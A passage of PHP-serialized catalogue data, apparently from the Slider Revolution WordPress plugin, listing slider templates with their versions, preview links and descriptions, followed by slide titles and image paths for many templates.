class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2021-02-23 10:45:36\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:522;a:22:{s:2:\"id\";s:3:\"556\";s:5:\"title\";s:19:\"Saas Product Slider\";s:5:\"alias\";s:19:\"saas-product-slider\";s:3:\"zip\";s:23:\"saas-product-slider.zip\";s:3:\"uid\";s:32:\"3cf7809058f383425c5409aa1204335f\";s:3:\"img\";s:30:\"saas-product-slider/slide1.jpg\";s:7:\"preview\";s:63:\"https://www.sliderrevolution.com/templates/saas-product-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.4.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"900\";s:11:\"description\";s:143:\"<span class=\"ttm_content\">Present your digital SaaS product with a modern design and stunning animations.</span><span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:173:\"[{\"path\":\"revslider-typewriter-addon\\/revslider-typewriter-addon.php\",\"name\":\"Typewriter AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/typewriter-addon\\/\"}]\";s:4:\"date\";s:19:\"2021-02-23 10:49:44\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:523;a:26:{s:2:\"id\";s:3:\"557\";s:5:\"title\";s:27:\"Cinematic Wildlife Template\";s:5:\"alias\";s:27:\"cinematic-wildlife-template\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:27:\"cinematic-wildlife-template\";s:3:\"img\";s:39:\"packages/cinematic-wildlife-package.jpg\";s:7:\"preview\";s:69:\"https://www.sliderrevolution.com/templates/cinematic-wildlife-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.4.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"800\";s:11:\"description\";s:185:\"<span class=\"ttm_content\">Easily create cinematic presentations with this photography-based slider, that features a convenient YouTube video popup.</span><span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2021-04-16 10:45:38\";s:7:\"package\";s:27:\"Cinematic Wildlife Template\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"47\";s:9:\"installed\";b:0;s:10:\"new_slider\";b:1;}i:524;a:26:{s:2:\"id\";s:3:\"558\";s:5:\"title\";s:25:\"Cinematic Wildlife Slider\";s:5:\"alias\";s:25:\"cinematic-wildlife-slider\";s:3:\"zip\";s:35:\"packs/cinematic-wildlife-slider.zip\";s:3:\"uid\";s:32:\"a37b04e221a845d6d446f4d70e815b87\";s:3:\"img\";s:36:\"cinematic-wildlife-slider/slide1.jpg\";s:7:\"preview\";s:69:\"https://www.sliderrevolution.com/templates/cinematic-wildlife-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.4.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"900\";s:11:\"description\";s:185:\"<span class=\"ttm_content\">Easily create cinematic presentations with this photography-based slider, that features a convenient YouTube video popup.</span><span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2021-04-16 10:47:01\";s:7:\"package\";s:27:\"Cinematic Wildlife Template\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"47\";s:9:\"installed\";b:0;s:10:\"new_slider\";b:1;}i:525;a:26:{s:2:\"id\";s:3:\"559\";s:5:\"title\";s:24:\"Cinematic Wildlife Modal\";s:5:\"alias\";s:24:\"cinematic-wildlife-modal\";s:3:\"zip\";s:34:\"packs/cinematic-wildlife-modal.zip\";s:3:\"uid\";s:32:\"636a6885199f684ad743167ceea70dc4\";s:3:\"img\";s:35:\"cinematic-wildlife-modal/slide1.jpg\";s:7:\"preview\";s:69:\"https://www.sliderrevolution.com/templates/cinematic-wildlife-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.4.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"900\";s:11:\"description\";s:185:\"<span class=\"ttm_content\">Easily create cinematic presentations with this photography-based slider, that features a convenient YouTube video popup.</span><span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2021-04-16 10:50:56\";s:7:\"package\";s:27:\"Cinematic Wildlife Template\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"1\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"47\";s:9:\"installed\";b:0;s:10:\"new_slider\";b:1;}}s:6:\"slides\";a:501:{s:16:\"classic-carousel\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"classic-carousel/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:27:\"classic-carousel/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:27:\"classic-carousel/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:27:\"classic-carousel/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:27:\"classic-carousel/slide5.jpg\";}}s:13:\"classicslider\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"classicslider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:24:\"classicslider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:24:\"classicslider/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:24:\"classicslider/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:24:\"classicslider/slide5.jpg\";}}s:11:\"contenttabs\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"contenttabs/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:22:\"contenttabs/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:22:\"contenttabs/slide3.jpg\";}}s:13:\"facebook-feed\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"facebook-feed/slide1.jpg\";}}s:7:\"fashion\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:18:\"fashion/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:18:\"fashion/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:18:\"fashion/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:18:\"fashion/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:18:\"fashion/slide5.jpg\";}}s:14:\"flickr-gallery\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"flickr-gallery/slide1.jpg\";}}s:3:\"gym\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:14:\"gym/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:14:\"gym/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:14:\"gym/slide3.jpg\";}}s:18:\"highlight-carousel\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"highlight-carousel/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:29:\"highlight-carousel/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:29:\"highlight-carousel/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:29:\"highlight-carousel/slide4.jpg\";}}s:18:\"highlight-showcase\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"highlight-showcase/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:29:\"highlight-showcase/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:29:\"highlight-showcase/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:29:\"highlight-showcase/slide4.jpg\";}}s:10:\"image-hero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:20:\"imagehero/slide1.jpg\";}}s:13:\"insta-gallery\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"insta-gallery/slide1.jpg\";}}s:19:\"levanorestaurantbar\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"levanorestaurantbar/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:30:\"levanorestaurantbar/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:30:\"levanorestaurantbar/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:30:\"levanorestaurantbar/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:30:\"levanorestaurantbar/slide5.jpg\";}}s:11:\"mainfeature\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"mainfeature/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:22:\"mainfeature/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:22:\"mainfeature/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:22:\"mainfeature/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:22:\"mainfeature/slide7.jpg\";}}s:17:\"media-gallery-two\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"media-gallery-two/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:28:\"media-gallery-two/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:28:\"media-gallery-two/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:28:\"media-gallery-two/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:28:\"media-gallery-two/slide6.jpg\";}}s:23:\"media-carousel-autoplay\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"media-carousel-autoplay/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:34:\"media-carousel-autoplay/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:34:\"media-carousel-autoplay/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:34:\"media-carousel-autoplay/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:34:\"media-carousel-autoplay/slide6.jpg\";}}s:21:\"news-background-video\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"news-bg-video/slide1.jpg\";}}s:12:\"news-gallery\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"news-gallery/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:23:\"news-gallery/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:23:\"news-gallery/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:23:\"news-gallery/slide4.jpg\";}}s:23:\"news-gallery-post-based\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"news-gallery-post-based/slide1.jpg\";}}s:9:\"news-hero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:20:\"news-hero/slide1.jpg\";}}s:10:\"news-video\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:21:\"news-video/slide1.jpg\";}}s:15:\"newsletter-hero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"newsletter-hero/slide1.jpg\";}}s:10:\"notgeneric\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:21:\"notgeneric/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:21:\"notgeneric/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:21:\"notgeneric/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:21:\"notgeneric/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:21:\"notgeneric/slide5.jpg\";}}s:11:\"photography\";a:10:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"photography/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:22:\"photography/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:22:\"photography/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:22:\"photography/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:22:\"photography/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:22:\"photography/slide6.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:22:\"photography/slide7.jpg\";}i:7;a:2:{s:5:\"title\";s:7:\"Slide 8\";s:3:\"img\";s:22:\"photography/slide8.jpg\";}i:8;a:2:{s:5:\"title\";s:7:\"Slide 9\";s:3:\"img\";s:22:\"photography/slide9.jpg\";}i:9;a:2:{s:5:\"title\";s:8:\"Slide 10\";s:3:\"img\";s:23:\"photography/slide10.jpg\";}}s:20:\"photography-carousel\";a:10:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"photography-carousel/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:31:\"photography-carousel/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:31:\"photography-carousel/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:31:\"photography-carousel/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:31:\"photography-carousel/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:31:\"photography-carousel/slide6.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:31:\"photography-carousel/slide7.jpg\";}i:7;a:2:{s:5:\"title\";s:7:\"Slide 8\";s:3:\"img\";s:31:\"photography-carousel/slide8.jpg\";}i:8;a:2:{s:5:\"title\";s:7:\"Slide 9\";s:3:\"img\";s:31:\"photography-carousel/slide9.jpg\";}i:9;a:2:{s:5:\"title\";s:8:\"Slide 10\";s:3:\"img\";s:32:\"photography-carousel/slide10.jpg\";}}s:16:\"search-form-hero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"search-form-hero/slide1.jpg\";}}s:16:\"showcasecarousel\";a:9:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"showcasecarousel/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:27:\"showcasecarousel/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:27:\"showcasecarousel/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:27:\"showcasecarousel/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:27:\"showcasecarousel/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:27:\"showcasecarousel/slide6.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:27:\"showcasecarousel/slide7.jpg\";}i:7;a:2:{s:5:\"title\";s:7:\"Slide 8\";s:3:\"img\";s:27:\"showcasecarousel/slide8.jpg\";}i:8;a:2:{s:5:\"title\";s:7:\"Slide 9\";s:3:\"img\";s:27:\"showcasecarousel/slide9.jpg\";}}s:11:\"sports-hero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:21:\"sportshero/slide1.jpg\";}}s:12:\"twitter-feed\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"twitter-feed/slide1.jpg\";}}s:13:\"vimeo-gallery\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"vimeo-gallery/slide1.jpg\";}}s:9:\"vimeohero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:20:\"vimeohero/slide1.jpg\";}}s:16:\"web-product-dark\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"web-product-dark/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:27:\"web-product-dark/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:27:\"web-product-dark/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:27:\"web-product-dark/slide4.jpg\";}}s:21:\"web-product-dark-hero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"web-product-dark-hero/slide1.jpg\";}}s:22:\"web-product-light-hero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"web-product-light-hero/slide1.jpg\";}}s:15:\"webproductlight\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"webproductlight/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:26:\"webproductlight/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:26:\"webproductlight/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:26:\"webproductlight/slide4.jpg\";}}s:15:\"youtube-gallery\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"youtube-gallery/slide1.jpg\";}}s:11:\"youtubehero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"youtubehero/slide1.jpg\";}}s:13:\"scroll-effect\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"scrolleffect/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:23:\"scrolleffect/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:23:\"scrolleffect/slide3.jpg\";}}s:12:\"content-zoom\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"contentzoom/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:22:\"contentzoom/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:22:\"contentzoom/slide3.jpg\";}}s:13:\"food-carousel\";a:7:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"foodcarousel/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:23:\"foodcarousel/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:23:\"foodcarousel/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:23:\"foodcarousel/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:23:\"foodcarousel/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:23:\"foodcarousel/slide6.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:23:\"foodcarousel/slide7.jpg\";}}s:14:\"rotating-words\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"rotatingwords/slide1.jpg\";}}s:22:\"travel-static-captions\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"travel-static-captions/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:33:\"travel-static-captions/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:33:\"travel-static-captions/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:33:\"travel-static-captions/slide4.jpg\";}}s:7:\"concept\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:18:\"concept/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:18:\"concept/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:18:\"concept/slide3.jpg\";}}s:17:\"fullscreen-button\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"fullscreen-button/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:28:\"fullscreen-button/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:28:\"fullscreen-button/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:28:\"fullscreen-button/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:28:\"fullscreen-button/slide5.jpg\";}}s:15:\"creativefreedom\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"creativefreedom/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:26:\"creativefreedom/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:26:\"creativefreedom/slide3.jpg\";}}s:13:\"parallaxscene\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"parallaxscene/slide1.jpg\";}}s:15:\"slidingoverlays\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"slidingoverlays/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:26:\"slidingoverlays/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:26:\"slidingoverlays/slide3.jpg\";}}s:25:\"web-product-light-hero-3d\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:36:\"web-product-light-hero-3d/slide1.jpg\";}}s:6:\"woobig\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:17:\"woobig/slide1.jpg\";}}s:16:\"woocommercesmall\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"woocommercesmall/slide1.jpg\";}}s:10:\"finedining\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:21:\"finedining/slide1.jpg\";}}s:12:\"agency-intro\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"agency-intro/slide1.jpg\";}}s:7:\"ourteam\";a:7:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:18:\"ourteam/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:18:\"ourteam/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:18:\"ourteam/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:18:\"ourteam/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:18:\"ourteam/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:18:\"ourteam/slide6.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:18:\"ourteam/slide7.jpg\";}}s:17:\"our-team-carousel\";a:7:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"ourteamcarousel/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:26:\"ourteamcarousel/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:26:\"ourteamcarousel/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:26:\"ourteamcarousel/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:26:\"ourteamcarousel/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:26:\"ourteamcarousel/slide6.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:26:\"ourteamcarousel/slide7.jpg\";}}s:13:\"betteryoutube\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"betteryoutube/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:24:\"betteryoutube/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 